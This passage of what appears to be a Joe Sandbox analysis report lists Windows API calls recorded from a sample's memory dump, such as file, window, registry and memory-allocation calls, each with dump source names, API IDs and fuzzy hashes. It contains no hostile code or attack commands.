                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD24,?,00000001,?,?,00000000,?,0042CD76,00000000,00452A11,00000000,00452A32,?,00000000), ref: 0042CD07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                                                                      • Instruction ID: bebe06870d533199fa05ec681e6f815a7bc371a3e359dcca221b2f893a48d47d
                                                                                                      • Opcode Fuzzy Hash: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                                                                      • Instruction Fuzzy Hash: 0AE06571304308BFD701EB62EC92A5EBBECD749714B914476B400D7592D5B86E008458
                                                                                                      APIs
                                                                                                      • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FormatMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 1306739567-0
                                                                                                      • Opcode ID: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                                                      • Instruction ID: 1e04b5e42f682bd3307758a00633d1e15c64123c11c882a5e2d093d9edca25ee
                                                                                                      • Opcode Fuzzy Hash: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                                                      • Instruction Fuzzy Hash: E7E0D86178432126F23524166C43B7B110E43C0704FD080267A809F3D6D6EE9949425E
                                                                                                      APIs
                                                                                                      • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                      • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                                                      • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                      • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                                                      APIs
                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                                                                      • Instruction ID: 00bf656f3cc58d957e3fc120c7d975a7f6f089e768df8f95d2ce2a55afbcf34e
                                                                                                      • Opcode Fuzzy Hash: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                                                                      • Instruction Fuzzy Hash: 69E07EB2600119AF9B40DE8CDC81EEB37ADAB1D350F414016FA08E7200C274EC519BB4
                                                                                                      APIs
                                                                                                      • FindClose.KERNEL32(00000000,000000FF,00470C14,00000000,00471A10,?,00000000,00471A59,?,00000000,00471B92,?,00000000,?,00000000), ref: 00454BFA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      • Opcode ID: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                                                                      • Instruction ID: 3c3cb6916585ff7422749358fc170cdffb6a73b651657da6609ae8be1e4b77d0
                                                                                                      • Opcode Fuzzy Hash: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                                                                      • Instruction Fuzzy Hash: A7E065B0A056004BCB15DF3A858021A76D25FC5325F05C96AAC58CF397D63C84955656
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(004953B6,?,004953D8,?,?,00000000,004953B6,?,?), ref: 004146AB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                      • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                      • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                      • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                      APIs
                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                                                      • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                                                      • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                                                      • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                                                      APIs
                                                                                                        • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                                                      • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                        • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoParametersSystem$ShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3202724764-0
                                                                                                      • Opcode ID: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                                                      • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                                                      • Opcode Fuzzy Hash: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                                                      • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                                                      APIs
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: TextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 530164218-0
                                                                                                      • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                                      • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                                                      • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                                      • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,004515B7,00000000), ref: 0042CD3F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                                                                      • Instruction ID: 866207c2a99293721dc17515f5e31636ca325c5e587501d47fbe5ff4e718b97c
                                                                                                      • Opcode Fuzzy Hash: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                                                                      • Instruction Fuzzy Hash: 77C08CE03222001A9A20A6BD2CC950F06CC891437A3A41F77B439E72E2D23DD8162018
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                      • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                      • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                      • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                                                                      • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                      • Opcode Fuzzy Hash: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                                                                      • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                      APIs
                                                                                                      • SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                                        • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 734332943-0
                                                                                                      • Opcode ID: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                                                                      • Instruction ID: d892f33e09ba9bc7304af59ed1bd982b4427bde6cd355302a364b0e8927efaaf
                                                                                                      • Opcode Fuzzy Hash: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                                                                      • Instruction Fuzzy Hash: 2DC04CA9300101879F00BAAE95D190663D85E583057504066B944CF207D668D8144A18
                                                                                                      APIs
                                                                                                      • SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectory
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611563598-0
                                                                                                      • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                                      • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                                                      • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                                      • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(?,0042E41D), ref: 0042E410
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                                      • Instruction ID: 55140b1eedf56d48a55774d01a07de49d55d18186a895614534630d02c3c9fff
                                                                                                      • Opcode Fuzzy Hash: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                                      • Instruction Fuzzy Hash: D4B09B7671C6105DFB05D695745152D63D4D7C57203E14577F010D7580D53D58004D18
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                                      • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                                                      • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                                      • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                                                                      • Instruction ID: 3a42617683b163d9d3e29dc322e321d1f787465d7b697eb1a78dfeb7447b1e7e
                                                                                                      • Opcode Fuzzy Hash: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                                                                      • Instruction Fuzzy Hash: CB518574E042099FEB01EFA9C892AAEBBF5EF49314F50417AE500E7351DB389D45CB98
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047DC20,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DBDA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 626452242-0
                                                                                                      • Opcode ID: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                                                                      • Instruction ID: a4a2cf2857c8d8ea8b604d5a3bb359359cf50968c17c86877c7e7666634e0114
                                                                                                      • Opcode Fuzzy Hash: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                                                                      • Instruction Fuzzy Hash: 79519C30A04248AFDB20DF65D8C5BAABBB8EB18304F118077E804A73A1D778AD45CB59
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                      Memory Dump Source
